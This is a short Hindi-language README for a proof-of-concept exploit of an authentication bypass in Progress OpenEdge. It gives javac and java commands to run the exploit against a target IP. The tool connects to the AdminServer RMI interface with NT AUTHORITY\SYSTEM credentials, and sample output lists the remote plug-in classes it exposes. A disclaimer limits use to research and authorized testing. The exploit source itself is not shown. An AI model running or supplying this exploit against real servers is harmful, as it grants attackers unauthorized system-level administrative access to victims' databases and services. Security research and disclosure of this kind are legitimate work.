
Progress OpenEdge प्रमाणीकरण बाईपास
Progress OpenEdge CVE-2024-1403 के लिए एक शोषण प्रूफ-ऑफ-कॉन्सेप्ट।
अधिक जानकारी यहाँ: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive
आपको निम्नलिखित jars के अपने स्वयं के संस्करण प्रदान करने होंगे:
progress.jaroeauth-12.8.-.jarosmetrics.jarjuniper.jar$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java
यह स्क्रिप्ट चलाने पर NT AUTHORITY\SYSTEM क्रेडेंशियल का उपयोग करके AdminServer RMI इंटरफ़ेस से कनेक्ट करने का प्रयास करेगी।
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.system.ISystemPlugIn
com.progress.agent.database.AgentPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.agent.database.IAgentPlugIn
com.progress.ubroker.tools.NSRemoteObject
com.progress.chimera.common.IChimeraHierarchy
com.progress.ubroker.tools.IYodaRMI
com.progress.ubroker.tools.IYodaSharedResources
com.progress.ubroker.tools.UBRemoteCommand
com.progress.chimera.common.IChimeraRemoteCommand
com.progress.juniper.admin.JAPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.juniper.admin.IJAPlugIn
com.progress.agent.smdatabase.SMPlugIn
com.progress.chimera.common.IChimeraRemoteObject
यह सॉफ़्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए, सिवाय उन मामलों के जहाँ स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।